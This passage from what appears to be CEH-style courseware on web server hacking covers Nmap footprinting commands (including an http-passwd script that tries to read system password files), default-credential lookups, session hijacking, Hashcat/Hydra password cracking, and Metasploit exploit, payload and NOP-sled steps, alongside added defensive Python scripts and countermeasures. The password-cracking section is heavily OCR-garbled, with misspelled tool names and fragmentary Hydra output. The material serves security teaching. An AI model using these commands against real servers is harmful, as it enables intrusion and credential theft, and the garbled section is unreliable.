▪ Detect HTTP TRACE:
  $ nmap -p80 --script http-trace <host>
▪ Check if the web server is protected by a web application firewall (WAF) or IPS:
  $ nmap -p80 --script http-waf-detect --script-args="http-waf-detect.uri=/testphp.vulnweb.com/artists.php,http-waf-detect.detectBodyChanges" www.modsecurity.org
▪ Enumerate common web applications:
  $ nmap --script http-enum -p80 <host>
▪ Obtain robots.txt:
  $ nmap -p80 --script http-robots.txt <host>

The following are some additional Nmap commands used to extract web server information:
▪ nmap -sV -O -p target IP address
▪ nmap -sV --script http-enum target IP address
▪ nmap target IP address -p 80 --script http-frontpage-login
▪ nmap --script http-passwd --script-args http-passwd.root target IP address

Figure 13.28: Screenshot of Nmap
Website Mirroring

Website mirroring copies an entire website and its content onto a local drive. The mirrored website reveals the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. With a mirrored target website, an attacker can easily map the website's directories and gain valuable information. An attacker who copies the website does not need to be online to go through the target website. Furthermore, the attacker can gain valuable information by searching the comments and other items in the HTML source code of downloaded web pages, which makes footprinting activities more efficient. Many website mirroring tools can be used to copy a target website onto a local drive; examples include NCollector Studio, HTTrack Web Site Copier, WebCopier Pro, and Website Ripper Copier.

▪ NCollector Studio
Source: http://www.calluna-software.com
NCollector Studio is a website mirroring tool used to download content from the web to a local computer. This tool enables users to crawl for specific file types, make any website available for offline browsing, or simply download a website to a local computer.

Figure 13.29: Screenshot of NCollector Studio

The following are some additional website mirroring tools:
▪ HTTrack Web Site Copier (https://www.httrack.com)
▪ WebCopier Pro (http://www.maximumsoft.com)
▪ Website Ripper Copier (https://www.tensons.com)
▪ WebRipper (http://visualwebripper.com)
▪ Cyotek WebCopy (https://www.cyotek.com)
Finding Default Credentials of Web Server

Administrators or security personnel use administrative interfaces to securely configure, manage, and monitor web application servers. Many web server administrative interfaces are publicly accessible and located in the root directory. Often, these administrative interface credentials are not properly configured and remain set to default. Attackers attempt to identify the running application interface of the target web server by performing port scanning. Once the running administrative interface is identified, the attacker uses the following techniques to identify the default login credentials:
▪ Consult the administrative interface documentation and identify the default passwords
▪ Use Metasploit's built-in database to scan the server
▪ Use online resources such as Open Sez Me (http://open-sez.me) and cirt.net (https://cirt.net/passwords) to identify the default passwords
▪ Attempt password-guessing and brute-forcing attacks
These default credentials can grant access to the administrative interface, compromising the web server and allowing the attacker to exploit the main web application.

▪ cirt.net
Source: https://cirt.net/passwords
Cirt.net is a lookup database for default passwords, credentials, and ports.

Figure 13.30: Screenshot of cirt.net displaying a default password page

The following are some additional websites for finding default passwords of server administrative interfaces:
▪ http://open-sez.me
▪ https://www.fortypoundhead.com
▪ http://www.defaultpassword.us
▪ https://default-password.info
▪ https://www.routerpasswords.com
Finding Default Content of Web Server

Most servers of web applications have default contents and functionalities that allow attackers to launch attacks. The following are some common default contents and functionalities that an attacker attempts to identify in web servers.
▪ Administrators' debug and test functionality: Functionalities designed for administrators to debug, diagnose, and test web applications and web servers contain useful configuration information and the runtime state of both the server and its running applications. Hence, these functionalities are the main targets for attackers.
▪ Sample functionality to demonstrate common tasks: Many servers contain various sample scripts and pages designed to demonstrate certain application server functions and application programming interfaces (APIs). Often, web servers fail to secure these scripts from attackers, and these sample scripts either contain vulnerabilities that can be exploited by attackers or implement functionalities that allow attackers to exploit.
▪ Publicly accessible powerful functions: Some web servers include powerful functionalities that are intended for administrative personnel and restricted from public use. However, attackers attempt to exploit such powerful functions to compromise the server and gain access. For example, some application servers allow web archives to be deployed over the same HTTP port as that used by the application. An attacker may use common exploitation frameworks such as Metasploit to perform scanning to identify default passwords, upload backdoors, and gain command-shell access to the target server.
▪ Server installation manuals: An attacker attempts to identify server manuals, which may contain useful information about configuration and server installation. Accessing this information allows the attacker to prepare an appropriate framework to exploit the installed web server.
Tools such as Nikto2 and exploit databases such as SecurityFocus (https://www.securityfocus.com) can be used to identify default contents.

▪ Nikto2
Source: https://cirt.net
Nikto is a vulnerability scanner used extensively to identify potential vulnerabilities in web applications and web servers.

Figure 13.31: Screenshot of Nikto2
Finding Directory Listings of Web Server

When a web server receives a request for a directory rather than a file, the web server responds to the request in the following ways:
▪ Return default resource within the directory: The server may return a default resource within the directory, such as index.htm.
▪ Return error: The server may return an error, such as the HTTP status code 403, indicating that the request is not permitted.
▪ Return listing of directory content: The server may return a listing showing the contents of the directory. A sample directory listing is shown in the screenshot.

Figure 13.32: Screenshot displaying a sample directory listing ("Index of /")

Though directory listings do not have significant relevance from a security perspective, they occasionally possess the following vulnerabilities that allow attackers to compromise web applications:
▪ Improper access controls
▪ Unintentional access to the web root of servers
In general, after discovering a directory on a web server, an attacker makes a request for that directory and attempts to access the directory listing. Attackers also attempt to exploit vulnerable web server software that grants access to directory listings.
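The Netcat and Telnet banner grabs, the Nmap http-trace check, the HTML-source comments that mirroring tools harvest, and the directory listings just described all come down to what a single HTTP response gives away. The following Python script is an added example, not from the EC-Council courseware or from any of the tools named above: it parses a raw response the way a banner grabber sees it and reports each of those disclosures, which is the check a server owner can run on their own responses before hardening them. The two sample responses are constructed; the `Microsoft-IIS/10.0` banner is the one shown in the Netcat and Telnet screenshots, and the regular expressions and the findings list are assumptions.

```python
"""Audit a raw HTTP response for the disclosures this section describes.

Added example (not from the EC-Council courseware). It splits a raw response
into status line, headers and body, then reports: a Server header that
carries a product version (what banner grabbing reveals), TRACE advertised in
an Allow header (what Nmap's http-trace looks for), an auto-generated
directory listing, and HTML comments that mirroring tools would harvest. The
sample responses are constructed.
"""
import re

# Constructed sample: a response that discloses everything at once.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "Allow: GET, HEAD, OPTIONS, TRACE\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><head><title>Index of /backup</title></head>\r\n"
    "<body><h1>Index of /backup</h1>\r\n"
    "<!-- TODO: remove old db dump before go-live -->\r\n"
    "<a href=\"site.sql\">site.sql</a></body></html>\r\n"
)

# Constructed sample: a hardened response with none of the findings.
SAMPLE_CLEAN = (
    "HTTP/1.1 200 OK\r\n"
    "Server: webserver\r\n"
    "Allow: GET, HEAD\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><h1>Welcome</h1></body></html>\r\n"
)

VERSION_RE = re.compile(r"/\d+(\.\d+)*")            # e.g. IIS/10.0, Apache/2.4.41
INDEX_RE = re.compile(r"<title>\s*Index of\s", re.IGNORECASE)
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)


def split_response(raw: str):
    """Split a raw response into (status line, {header: value}, body).

    Header names are lower-cased so lookups do not depend on server casing.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def audit_response(raw: str) -> dict:
    """Return the disclosures a defender wants to know about in one response."""
    _status, headers, body = split_response(raw)
    server = headers.get("server", "")
    allowed = [m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()]
    return {
        "server": server,
        "version_disclosed": bool(VERSION_RE.search(server)),
        "trace_allowed": "TRACE" in allowed,
        "directory_listing": bool(INDEX_RE.search(body)),
        "html_comments": [c.strip() for c in COMMENT_RE.findall(body)],
    }


def findings(raw: str) -> list:
    """Human-readable list of problems; empty when the response is clean."""
    a = audit_response(raw)
    out = []
    if a["version_disclosed"]:
        out.append(f"Server header discloses a version: {a['server']}")
    if a["trace_allowed"]:
        out.append("TRACE method advertised in Allow header")
    if a["directory_listing"]:
        out.append("body looks like an auto-generated directory listing")
    if a["html_comments"]:
        out.append(f"{len(a['html_comments'])} HTML comment(s) left in body")
    return out


if __name__ == "__main__":
    for line in findings(SAMPLE_RESPONSE):
        print("finding:", line)
```

The same parser can be pointed at a response captured with the Netcat or Telnet exchange shown earlier; the version check fires on any `product/number` token, so a Server header reduced to a bare product name passes.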
Vulnerability Scanning

Vulnerability scanning is performed to identify vulnerabilities and misconfigurations in a target web server or network. Vulnerability scanning reveals possible weaknesses in a target server to exploit in a web server attack. In the vulnerability-scanning phase, attackers use sniffing techniques to obtain data on the network traffic to determine active systems, network services, and applications. Automated tools such as Acunetix Web Vulnerability Scanner are used to perform vulnerability scanning on a target server and find hosts, services, and vulnerabilities.

▪ Acunetix Web Vulnerability Scanner
Source: https://www.acunetix.com
Acunetix Web Vulnerability Scanner (WVS) scans websites and detects vulnerabilities. Acunetix WVS checks web applications for SQL injections, XSS, and so on. It includes advanced pen testing tools to ease manual security audit processes and creates professional security audit and regulatory compliance reports based on AcuSensor Technology. It supports the testing of web forms and password-protected areas, pages with CAPTCHA, single sign-on, and two-factor authentication mechanisms. It detects application languages, web server types, and smartphone-optimized sites. Acunetix crawls and analyzes different types of websites, including HTML5, Simple Object Access Protocol (SOAP), and Asynchronous JavaScript and Extensible Markup Language (AJAX). It supports the scanning of network services running on the server and the port scanning of the web server.

Figure 13.33: Screenshot of Acunetix Web Vulnerability Scanner

The following are some additional vulnerability scanning tools:
▪ Fortify WebInspect (https://www.microfocus.com)
▪ Tenable.io (https://www.tenable.com)
▪ Immuniweb (https://www.immuniweb.com)
▪ Netsparker (https://www.netsparker.com)
Finding Exploitable Vulnerabilities

Flaws in software design and programming errors lead to security vulnerabilities. Attackers take advantage of these vulnerabilities to perform various attacks on the confidentiality, availability, or integrity of a system. Software vulnerabilities such as programming flaws in a program, service, or within the OS software kernel can be exploited to execute malicious code. Many public vulnerability repositories that are available online allow access to information about various software vulnerabilities. Attackers search on exploit sites such as SecurityFocus (https://www.securityfocus.com) and Exploit Database (https://www.exploit-db.com) for exploitable vulnerabilities of a web server based on its OS and software applications. Attackers use the information gathered in the previous stages to find the relevant vulnerabilities by using Exploit Database. Exploiting these vulnerabilities allows attackers to execute a command or binary on a target machine to gain higher privileges than existing ones or to bypass security mechanisms. Attackers using these exploits can even access privileged user accounts and credentials.

Figure 13.34: Screenshot of Google Hacking Database (GHDB)
Session Hijacking

Valid session IDs can be sniffed to gain unauthorized access to a web server and snoop its data. An attacker can hijack or steal valid session content using various techniques such as session token prediction, session replay, session fixation, sidejacking, and XSS. By using these techniques, the attacker attempts to capture valid session cookies and IDs in established sessions. The attacker uses tools such as Burp Suite, Firesheep, and JHijack to automate session hijacking.

▪ Burp Suite
Source: https://portswigger.net
Burp Suite is a web security testing tool that can hijack session IDs in established sessions. The Sequencer tool in Burp Suite tests the randomness of session tokens. With this tool, an attacker can predict the next possible session ID token and use that to take over a valid session.

Figure 13.35: Screenshot of Burp Suite

The following are some additional session hijacking tools:
▪ JHijack (https://sourceforge.net)
▪ Ettercap (https://ettercap.github.io)
▪ CookieCatcher (https://github.com)
▪ CookieCadger (https://github.com)

Note: For complete coverage of concepts and techniques related to session hijacking, refer to Module 11: Session Hijacking.
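Burp Sequencer, described above, judges whether a session token can be predicted from a sample of captured tokens. The following Python script is an added example and is not from the courseware or from Burp: it is a much simpler server-side version of the same idea that a developer can run against a token generator before deployment. It measures the Shannon entropy per character over a sample, checks whether consecutive tokens are a small numeric step apart (the sequential-ID case that makes prediction trivial), and reports the estimated bits in a token. Both generators, the 64-bit floor, and the step size are assumptions made for the demonstration.

```python
"""Estimate how predictable a web application's session tokens are.

Added example (not from the EC-Council courseware). A sample of tokens is
scored on two properties an attacker with Burp Sequencer would look for:
low character entropy (too few bits per token) and sequential values
(each token a small step from the previous one). Both generators below are
constructed for the demonstration.
"""
import math
import secrets
from collections import Counter


def weak_tokens(n: int, start: int = 1000) -> list:
    """Constructed weak generator: a counter rendered as 8 hex digits."""
    return [format(start + i, "08x") for i in range(n)]


def strong_tokens(n: int) -> list:
    """Tokens from the OS CSPRNG, 128 bits each, rendered as 32 hex digits."""
    return [secrets.token_hex(16) for _ in range(n)]


def entropy_per_char(tokens: list) -> float:
    """Shannon entropy (bits per character) over all characters in the sample."""
    counts = Counter("".join(tokens))
    total = sum(counts.values())
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def is_sequential(tokens: list, max_step: int = 16) -> bool:
    """True if every consecutive pair of tokens is a small positive step apart.

    Tokens that are not hexadecimal numbers cannot be sequential in this sense.
    The step size is an assumption chosen for the demonstration.
    """
    try:
        values = [int(t, 16) for t in tokens]
    except ValueError:
        return False
    return all(0 < b - a <= max_step for a, b in zip(values, values[1:]))


def assess(tokens: list) -> dict:
    """Summarise the sample; 'weak' is True when either check fails.

    The estimate multiplies per-character entropy by token length, which
    overstates strength for structured tokens, so it is a ceiling, not a
    guarantee. 64 bits is an assumed floor for this demo.
    """
    per_char = entropy_per_char(tokens)
    est_bits = per_char * len(tokens[0])
    seq = is_sequential(tokens)
    return {
        "entropy_per_char": round(per_char, 2),
        "estimated_bits": round(est_bits, 1),
        "sequential": seq,
        "weak": seq or est_bits < 64,
    }


if __name__ == "__main__":
    print("counter tokens:", assess(weak_tokens(50)))
    print("CSPRNG tokens: ", assess(strong_tokens(200)))
```

The counter-based tokens fail both checks; the CSPRNG tokens are not sequential and estimate at close to 128 bits. A generator that passes this script can still be weak in ways a character histogram cannot see, which is why Sequencer runs a battery of statistical tests rather than one.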
WebServerPasswordHacking

WebServerPasswordHacking
In this phase
of web server hacking,an attackerattemptsto crackweb server passwords. The
attackermay employ all possible
techniques of password crackingto extract passwords,
including password guessing,dictionary attacks,brute-force attacks,hybridattacks,
precomputed hashes, rule-basedattacks,distributednetworkattacks,
andrainbowattacks.The
attackerneedspatience to crackpasswords becausesome of thesetechniques are tediousand
time-consuming. Theattackercan alsouse automatedtoolssuchas Hashcat, THC Hydra, and
Nerackto crackweb passwords andhashes.
=
Hasheat
Source:https://hashcat.net
Hashcat
is a cracker with multiple
compatible OSsandplatforms
andcan perform multi
hash(MD4, 5; SHA 224,256,384,512;RIPEMD-160;
-

etc.],multi-devicepassword
cracking.
Theattackmodesof thistool are straight,
combination, hybrid
bruteforce, dict
+mask,
andhybrid
+
mask dict.

ical andCountermensores
Mackin ©by E-Comel
Copyright
13.26Screenshot
Figure ofHasheat cracker
password
THC Hydra
Source: https://github.com
THC Hydra is a parallelized login cracker that can attack numerous protocols. This tool is proof-of-concept code that provides researchers and security consultants the possibility to demonstrate how easy it would be to gain unauthorized remote access to a system. Because it works online, every guess is a login attempt against the live target, so account lockout policies, rate limits, and authentication logs are the defender's signal.
Currently, this tool supports the following protocols: Asterisk; Apple Filing Protocol (AFP); Cisco Authentication, Authorization, and Accounting (AAA); Cisco auth; Cisco enable; Concurrent Versions System (CVS); Firebird; FTP; HTTP-FORM-GET; HTTP-FORM-POST; HTTP-GET; HTTP-HEAD; HTTP-POST; HTTP-PROXY; HTTPS-FORM-GET; HTTPS-FORM-POST; HTTPS-GET; HTTPS-HEAD; HTTPS-POST; HTTP-Proxy; ICQ; Internet Message Access Protocol (IMAP); Internet Relay Chat (IRC); Lightweight Directory Access Protocol (LDAP); Memcached; MongoDB; Microsoft SQL Server; MySQL; Network Control Protocol (NCP); Network News Transfer Protocol (NNTP); Oracle Listener; Oracle system identifier (SID); Oracle; PC-Anywhere; personal computer Network File System (PC-NFS); POP3; Postgres; Radmin; Remote Desktop Protocol (RDP); Rexec; Rlogin; Rsh; Real Time Streaming Protocol (RTSP); SAP R/3; Session Initiation Protocol (SIP); Server Message Block (SMB); Simple Mail Transfer Protocol (SMTP); SMTP Enum; Simple Network Management Protocol (SNMP) v1+v2+v3; SOCKS5; SSH (v1 and v2); SSH key; Subversion; TeamSpeak (TS2); Telnet; VMware-Auth; Virtual Network Computing (VNC); and Extensible Messaging and Presence Protocol (XMPP).

parr
hydra
-L /root/Mordlists/Userr

=
10
fan Hauser/THC
vice organizations, or for illegal purpo:
ra. (https: //github .com/vanhauser-the/the-hydra)
overall 16 tasks, 41174 login tri
19,.10..10.10:
Liftp] host: 10.10.10. 10 word: apple
ATUSY4 tries/min, 4727 tries in 00:01n, 36447 to do in 00
min, 14103 00:03h, 27068 to do i n 00:0

0.10.10.
16. ord:
test
19,10,10.10 word: qwerty
¢

S/min, 8214 to do in 00:02h,


nin, 37650 tries in 00:08n, 3524 to do

successfullycompleted,
t

8
3 valid passwordsfound
[WARNING]
Writing restore file because final worker threads did not complet
until end
or could
not be
connected
complete
finished at
con/vanhauser-thc/the-hydra)
‘github.

Figure 13.37: Screenshot of THC Hydra password cracker

The following are some additional password cracking tools:
- Ncrack (https://nmap.org)
- RainbowCrack (http://project-rainbowcrack.com)
- Wfuzz (http://www.edge-security.com)
- Wireshark (https://www.wireshark.org)

Using Application Server as a Proxy
Web servers are occasionally configured to perform functions such as forwarding or reverse HTTP proxying. Web servers with these functions enabled are employed by attackers to perform the following attacks:
- Attacking third-party systems on the Internet
- Connecting to arbitrary hosts on the organization's internal network
- Connecting back to other services running on the proxy host itself
Attackers use GET and CONNECT requests to use vulnerable web servers as proxies to connect to and obtain information from target systems through these web servers. The tell-tale signs in the server's access log are a GET (or POST) whose request line carries an absolute URI for some other host (GET http://internal-host/ HTTP/1.1) and CONNECT host:port requests, neither of which an ordinary origin server should be honouring for arbitrary destinations.

Figure 13.38: Illustration of the use of an application server as a proxy
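The three abuse cases above, turned into access-log detection as an added example written for this page (not code from the original text or from any product). It parses Apache/nginx common-log-format lines and flags CONNECT requests and absolute-URI GETs, classifying the destination as a third-party host, the organization's internal network, or the proxy host itself. The own-hostname set, the internal address ranges, and the sample log lines are constructed assumptions for the example.

```python
"""Added example: spot a web server being used as an HTTP proxy from its access log."""
import re
from ipaddress import ip_address, ip_network

# Apache/nginx common log format (only the fields needed here are captured).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Assumptions for the example: names this server legitimately answers for, and
# the address ranges that make up "the organization's internal network".
OWN_HOSTS = {"www.example.com", "example.com"}
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LOOPBACK = ip_network("127.0.0.0/8")


def destination_class(host):
    """Map a destination host to the three abuse cases named in the text."""
    if host == "localhost":
        return "proxy-host-itself"
    try:
        ip = ip_address(host)
    except ValueError:  # a hostname rather than a literal address
        return "internal-network" if host.endswith(".internal") else "third-party"
    if ip in LOOPBACK:
        return "proxy-host-itself"
    if any(ip in net for net in INTERNAL_NETS):
        return "internal-network"
    return "third-party"


def host_of(target):
    """Host from 'host:port' or 'scheme://host[:port]/path' (IPv6 literals not handled)."""
    if "://" in target:
        target = target.split("://", 1)[1].split("/", 1)[0]
    return target.rsplit(":", 1)[0]


def classify(line):
    """None for ordinary traffic, else (destination_class, method, client, target)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, target, client = m.group("method"), m.group("target"), m.group("client")
    if method == "CONNECT":  # request for a raw TCP tunnel through this server
        return (destination_class(host_of(target)), method, client, target)
    if "://" in target:  # absolute-form request-target: "fetch this from another host"
        host = host_of(target)
        if host in OWN_HOSTS:  # absolute-form naming ourselves is legitimate HTTP/1.1
            return None
        return (destination_class(host), method, client, target)
    return None


def scan(lines):
    """All proxy-abuse hits in a sequence of log lines, in log order."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log: one normal request, one harmless absolute-form request,
# then a client using the server to reach an internal box, an outside site,
# an internal SSH port, the server's own database port, and a third-party mail server.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2020:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 612',
    '203.0.113.7 - - [10/Oct/2020:13:55:40 +0000] "GET http://www.example.com/index.html HTTP/1.1" 200 612',
    '198.51.100.9 - - [10/Oct/2020:13:56:01 +0000] "GET http://10.0.0.5:8080/admin HTTP/1.1" 200 2048',
    '198.51.100.9 - - [10/Oct/2020:13:56:05 +0000] "GET http://victim.example.org/ HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Oct/2020:13:56:09 +0000] "CONNECT 10.0.0.5:22 HTTP/1.1" 200 -',
    '198.51.100.9 - - [10/Oct/2020:13:56:12 +0000] "CONNECT 127.0.0.1:3306 HTTP/1.1" 200 -',
    '198.51.100.9 - - [10/Oct/2020:13:56:15 +0000] "CONNECT mail.example.net:25 HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for kind, method, client, target in scan(SAMPLE_LOG):
        print("%-18s %-8s %s -> %s" % (kind, method, client, target))
```

A 200 status on these lines means the server actually served the proxied request; a 4xx means the configuration already refuses it, which is the state to aim for (on Apache, ProxyRequests Off; on nginx, no proxy_pass to a client-supplied host). The loopback and RFC 1918 matches are the ones to alert on first, since they indicate the attacker has reached past the perimeter.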

Module Flow: Web Server Concepts; Web Server Attacks; Web Server Attack Methodology; Web Server Attack Tools; Countermeasures; Patch Management; Web Server Security Tools
Web Server Attack Tools
In the preceding section, we discussed the methodology used by attackers to hack a web server. This section introduces web server hacking tools that attackers may use in the methodology described in the preceding section. These tools extract critical information during the hacking process.

Metasploit
Source: https://www.metasploit.com
The Metasploit Framework is a penetration-testing toolkit, exploit development platform, and research tool that includes hundreds of working remote exploits for various platforms. It performs fully automated exploitation of web servers by abusing known vulnerabilities and leveraging weak passwords via Telnet, SSH, HTTP, and SNMP.

Figure 13.39: Screenshot of Metasploit

An attacker may use the following features of Metasploit to perform a web server attack:
- Closed-loop vulnerability validation
- Phishing simulations
- Social engineering
- Manual brute forcing
- Manual exploitation
- Evading leading defensive solutions
Metasploit enables pen testers to perform the following:
- Quickly complete pen-test assignments by automating repetitive tasks and leveraging multi-level attacks
- Assess the security of web applications, network and endpoint systems, as well as email users
- Tunnel any traffic through compromised targets to pivot deep into a network
- Customize the content and template of executive, audit, and technical reports

Metasploit Architecture
The Metasploit Framework is an open-source exploitation framework that provides security researchers and pen testers with a uniform model for the rapid development of exploits, payloads, encoders, no-operation (NOP) generators, and reconnaissance tools. The framework reuses large chunks of code that a user would otherwise have to copy or re-implement on a per-exploit basis. The framework is modular in architecture and encourages the reuse of code across various projects. The framework can be broken down into a few different pieces, the lowest level of which is the framework core. The framework core is responsible for implementing all the required interfaces that allow interaction with exploit modules, sessions, and plugins. It supports vulnerability research, exploit development, and the creation of custom security tools.

Metasploit Exploit Module
It is the basic module in Metasploit used to encapsulate a single exploit, using which users can target many platforms. This module has simplified meta-information fields. Using the Mixins feature, users can also dynamically modify exploit behavior, perform brute-force attacks, and attempt passive exploits.
A system can be exploited with the Metasploit Framework through the following steps:
- Configure an active exploit
- Verify the exploit options
- Select a target
- Select a payload
- Launch the exploit
In msfconsole these steps correspond to use <module>, show options followed by set <option> <value>, show targets followed by set TARGET, set PAYLOAD, and finally exploit. A run that stops at "verify the exploit options" with an unset RHOSTS or LHOST is the most common reason an otherwise working exploit does nothing.
Metasploit Payload Module
An exploit carries a payload in its backpack when it breaks into a system and then leaves the backpack there. The following three types of payload modules are provided by the Metasploit Framework:
- Singles: Self-contained and completely standalone
- Stagers: Set up a network connection between the attacker and victim
- Stages: Downloaded by stager modules

A payload module can upload and download files from the system, take screenshots, and collect password hashes. It can even take over the screen, mouse, and keyboard to control a computer remotely. The payload module establishes a communication channel between the Metasploit framework and the victim host. It contains arbitrary code that is executed as the result of an exploit succeeding. To generate payloads, a payload is first selected using the command shown in the screenshot (set payload <name> in msfconsole; show payloads lists only the payloads compatible with the exploit currently in use).

Figure 13.41: Screenshot displaying the Metasploit payload command
Metasploit Auxiliary Module
Auxiliary modules of Metasploit can be used to perform arbitrary, one-off actions such as port scanning, DoS, and even fuzzing. Metasploit includes tools and modules that assess the security of the target as well as auxiliary modules such as scanners, DoS modules, and fuzzers. The show auxiliary command in Metasploit can be used to list all the available auxiliary modules. All modules in Metasploit other than the ones used to exploit are auxiliary modules; Metasploit uses auxiliary modules as an extension for various purposes other than exploitation. Auxiliary modules are stored in the modules/auxiliary/ directory of the framework's main directory. The run command or the exploit command can be used to run an auxiliary module.

Figure 13.42: Screenshot displaying Metasploit auxiliary module commands

The basic definition of an auxiliary module is as follows (the skeleton shown on the page, completed with the initialize and run methods the framework expects; newer Metasploit versions name the class MetasploitModule and no longer need the require line):

    require 'msf/core'

    class Metasploit3 < Msf::Auxiliary
      def initialize(info = {})
        super(update_info(info, 'Name' => 'My Auxiliary Module', 'License' => MSF_LICENSE))
      end
      def run; print_status('My Auxiliary Module running'); end   # invoked by "run"
    end # for the class definition
Metasploit NOPS Module
NOP modules generate no-operation instructions used for padding buffers, so that execution lands in the payload regardless of the exact address jumped to. The generate command can be used to generate a NOP sled of arbitrary size and display it in a given format. The x86/opty2 generator used below builds the sled from a randomized mix of harmless single-byte instructions rather than a run of 0x90, which is why its output differs on every run and why the -b option can exclude bytes the target will not accept.

The following commands select the generator and show its usage:

    msf > use x86/opty2
    msf nop(opty2) > generate -h
    Usage: generate [options] length

    Options:
      -b <opt>  A list of characters to avoid ("\x00\xff")
      -h        Help banner
      -s <opt>  A comma separated list of registers to save
      -t <opt>  The output type (Ruby, Perl, C, or raw)

The following command is used to generate a 50-byte NOP sled in C format (only part of the printed array is legible in the screenshot; the bytes vary per run):

    msf nop(opty2) > generate -t c 50
    unsigned char buf[] =
    "...\x3d\x05\x15\xf8\x67\xba\x7d\x08\xd6\x66\x9f\xb8\x2d\xb6"
    "\x24\xb1\xbe\x3f\x43\x1d\x93\xb2\x37\x35\x84..."
    "...\x41\xb9\x48\x04\x99\x46\x29\xb0\xb7\x2f\xfd\x96\xda\x98"
    "\x92\xb5...\x4f\x91";
    msf nop(opty2) >

Web Server Attack Tools
Immunity's CANVAS
Source: https://www.immunityinc.com
Immunity's CANVAS provides penetration testers and security professionals with hundreds of exploits, an automated exploitation system, and a comprehensive, reliable exploit development framework. It provides features such as client-side exploitation, privilege escalation, HTTP tunneled privilege escalation, remote kernel exploitation, advanced backdoor technology, and advanced web attack technology.

The following are some additional web server attack tools:
- THC Hydra (https://github.com)
- HULK DoS (https://github.com)
- MPack (https://sourceforge.net)
- w3af (http://w3af.org)

Module Flow: Web Server Concepts; Web Server Attacks; Web Server Attack Methodology; Web Server Attack Tools; Countermeasures; Patch Management; Web Server Security Tools
Countermeasures
In previous sections, we discussed the benefits of a well-informed web server security posture, the danger posed by web server attacks, the methodology used in web server attacks, and the tools that assist an attacker in performing web server attacks. This section discusses the tools and techniques used in securing web servers: the various methods to detect web server attacks, countermeasures, and defense techniques.

Place Web Servers in Separate Secure Server Security Segment on Network
An ideal web hosting network should be designed with three segments: an Internet segment; a secure server security segment, which is often called the demilitarized zone (DMZ); and an internal network. The first step in securing web servers is to place them separately in the DMZ, which is isolated from the public network and from the internal network. Placing web servers in a separate segment adds security barriers between the web servers and the internal network as well as between the web servers and the outside public network. This separation allows the administrator to place firewalls and apply access control based on security rules for the internal network as well as for Internet traffic toward the DMZ. Such a web-hosting network can limit the damage from attacks on the web server by outside attackers or malicious insiders.
Network segmentation divides a network into different segments, each having its own hub or switch. It allows network administrators to protect one segment from others by enforcing firewalls and security rules depending on the level of security desired. In a segmented network, an attacker who compromises one segment of the network cannot directly reach the other segments; only the traffic the firewall explicitly permits (for example, the web server's connection to a database port) can be used to move further, so those permitted flows should be kept to the minimum and logged. Let us consider a sample web-hosting network that is segmented by the administrator in such a manner that the web server is placed in a DMZ.

Countermeasures: Patches and Updates
The following are various countermeasures for secure update and patch management of web servers:
- Scan for existing vulnerabilities; patch and update the server software regularly.
- Before applying any service pack, hotfix, or security patch, read and peer review all relevant documentation.
- Apply all updates, regardless of their type, on an "as-needed" basis.
- Test service packs and hotfixes in a representative non-production environment prior to deployment in production.
- Ensure that service packs, hotfixes, and security patch levels are consistent on all domain controllers (DCs).
- Ensure that server outages are scheduled and that a complete set of backup tapes and emergency repair disks are available.
- Keep a back-out plan that allows the system and enterprise to return to their original state, prior to a failed implementation.
- Schedule periodic service-pack upgrades as part of operations maintenance and never trail by more than two service packs.
- Disable all unused script extension mappings.
- Avoid using the default configurations that web servers are dispatched with.
- Use virtual patches in the organization because they provide additional identification/logging capabilities while the real fix is being tested.
- Establish a disaster recovery plan to handle patch management failures.
Countermeasures: Protocols and Accounts
Countermeasures: Protocols
The following are various countermeasures for using secure protocols on web servers:
- Block all unnecessary ports, Internet Control Message Protocol (ICMP) traffic, and unnecessary protocols such as Network Basic Input/Output System (NetBIOS) and SMB.
- Harden the TCP/IP stack and consistently apply the latest software patches and updates to system software.
- If insecure protocols such as Telnet, POP3, SMTP, and FTP are used, then take appropriate measures to provide secure authentication and communication, for example, by using IP Security (IPSec) policies.
- If remote access is needed, ensure that remote connections are secured properly by using tunneling and encryption protocols.
- Disable Web Distributed Authoring and Versioning (WebDAV) if it is not used by the application, or keep it secure if it is required.
- Use secure protocols such as Transport Layer Security (TLS)/SSL for communicating with the web server.
- Ensure that anonymous (unauthenticated) FTP servers operate in an innocuous part of the directory tree that is different from the web server's tree.
Countermeasures: Accounts
The following countermeasures can be adopted to secure user accounts on a web server:
- Remove all unused modules and application extensions.
- Disable unused default user accounts created during the installation of an OS.
- When creating a new web root directory, grant the appropriate (least possible) NT File System (NTFS) permissions to anonymous users of the IIS web server to access the web content.
- Eliminate unnecessary database users and stored procedures and follow the principle of least privilege for the database application to defend against SQL query poisoning.
- Use secure web permissions, NTFS permissions, and .NET Framework access control mechanisms including URL authorization.
- Slow down brute-force and dictionary attacks with strong password policies, and implement audits and alerts for login failures.
- Run processes using least privileged accounts as well as least privileged service and user accounts.
- Limit the administrator or root-level access to the minimum number of users and maintain a record of the same.
- Maintain logs of all user activity in an encrypted form on the web server or in a separate machine on the intranet.
- Disable all non-interactive accounts that should exist but do not require an interactive login.
Countermeasures: Files and Directories
The following countermeasures can be adopted for securing files and directories on a web server:
- Eliminate unnecessary files within .jar files.
- Eliminate sensitive configuration information within the bytecode.
